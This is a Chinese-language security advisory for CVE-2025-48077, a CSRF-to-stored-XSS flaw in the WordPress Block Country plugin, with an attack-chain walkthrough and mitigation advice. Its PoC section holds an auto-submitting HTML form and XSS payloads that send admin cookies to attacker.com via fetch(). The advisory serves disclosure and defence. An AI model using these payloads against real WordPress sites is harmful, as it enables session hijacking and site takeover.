CVE-2025-48077: WordPress Block Country插件CSRF导致存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-48077

漏洞类型

CSRF + 存储型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Block Country WordPress插件（nitinmaurya12/block-country）

漏洞概述

CVE-2025-48077是WordPress Block Country插件中的一个高危安全漏洞，CVSS评分达到7.1分。该漏洞属于跨站请求伪造（CSRF）与存储型跨站脚本（Stored XSS）的组合漏洞。攻击者可以利用CSRF漏洞诱骗已认证的管理员用户在不知情的情况下执行恶意操作，进而在插件的设置页面中注入恶意JavaScript代码。由于这些代码会存储在数据库中并在前端页面持续执行，所有访问受影响页面的用户都将受到攻击。该漏洞影响了Block Country插件从初始版本到1.0版本的所有用户。攻击者主要针对WordPress网站管理员，通过社工手段诱导管理员访问恶意链接或页面，从而在管理员后台注入存储型XSS payload。一旦成功，攻击者可以窃取管理员会话cookie、劫持管理员账户、篡改网站内容或进一步渗透整个服务器。由于WordPress插件的广泛使用，此漏洞可能影响大量使用Block Country插件进行访问控制的网站。

技术细节

该漏洞的根本原因在于Block Country插件缺少对关键操作（如国家阻止规则设置）的CSRF令牌验证机制。攻击者构造一个恶意HTML页面，其中包含自动提交的表单，该表单模拟插件的设置保存请求。由于插件未验证请求的来源合法性（缺少anti-CSRF token），服务器会接受并处理这些请求。攻击者可以在表单字段中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>），这些代码会被存储在WordPress数据库的wp_options表或自定义表中。当管理员访问插件设置页面或相关前端页面时，存储的恶意脚本会被浏览器执行。攻击者利用此漏洞可实现：1) 窃取管理员认证凭证和会话cookie；2) 在管理员界面中注入伪造的管理员账户；3) 将管理员重定向到恶意网站；4) 纂改网站内容或植入后门程序。整个攻击过程无需直接认证，攻击者仅需诱导管理员访问恶意页面即可。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者识别目标网站使用的WordPress版本和Block Country插件版本（<=1.0），确定插件的设置提交端点和参数名称

STEP 2

步骤2: 构造恶意页面

攻击者创建一个包含自动提交表单的HTML页面，表单中包含恶意的JavaScript XSS payload，并指向目标网站的插件设置端点

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、恶意链接或其他方式诱导已登录的WordPress管理员访问攻击者控制的恶意页面

STEP 4

步骤4: CSRF请求执行

恶意页面自动向目标网站的Block Country插件设置页面发送POST请求，由于插件缺少CSRF令牌验证，请求被服务器接受并处理

STEP 5

步骤5: XSS payload存储

包含恶意JavaScript代码的设置数据被存储在WordPress数据库中，当管理员或用户访问相关页面时，payload会从数据库加载并在前端执行

STEP 6

步骤6: 会话劫持

恶意脚本执行后，攻击者通过外带数据（DNS/HTTP请求）获取管理员的cookie和会话信息，进而劫持管理员账户

STEP 7

步骤7: 持久化控制

攻击者利用管理权限在网站中植入后门、创建恶意管理员账户或进一步渗透服务器，建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-48077: Block Country Plugin CSRF to Stored XSS -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - Block Country Plugin</title>
</head>
<body>
    <h1>CSRF Attack PoC</h1>
    <p>This PoC demonstrates the CSRF vulnerability in Block Country plugin.</p>
    
    <!-- Auto-submit form to inject stored XSS payload -->
    <form id="attackForm" action="http://target-wordpress-site/wp-admin/admin.php?page=block-country" method="POST" enctype="multipart/form-data">
        <!-- Inject malicious JavaScript payload -->
        <input type="hidden" name="block_country_settings" value='<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>’>
        <input type="hidden" name="submit" value="Save Changes">
    </form>
    
    <script>
        // Automatically submit the form on page load
        document.getElementById('attackForm').submit();
        
        // Alternative: XSS payload for stored XSS
        const xssPayload = "<img src=x onerror='fetch(\"https://attacker.com/log?data=\"+btoa(document.cookie))'>";
        console.log("XSS Payload:", xssPayload);
        
        // Simulate the attack execution
        function executeAttack() {
            const form = document.createElement('form');
            form.action = 'http://target-site/wp-admin/admin.php?page=block-country';
            form.method = 'POST';
            
            const input = document.createElement('input');
            input.name = 'block_country_countries';
            input.value = xssPayload;
            form.appendChild(input);
            
            document.body.appendChild(form);
            form.submit();
        }
        
        // Attack will execute automatically when page loads
        console.log("CSRF Attack PoC Loaded - Form auto-submitted");
    </script>
</body>
</html>

影响范围

Block Country插件 <= 1.0.0（所有版本）

防御指南

临时缓解措施

立即禁用Block Country插件直到官方发布安全更新。如果必须使用该插件的功能，可以临时使用.htaccess或nginx配置进行IP/国家层面的访问控制。同时，建议管理员定期检查wp_options表和插件相关数据表，删除任何可疑的配置值。启用WordPress的日志审计功能，监控异常的插件设置变更请求。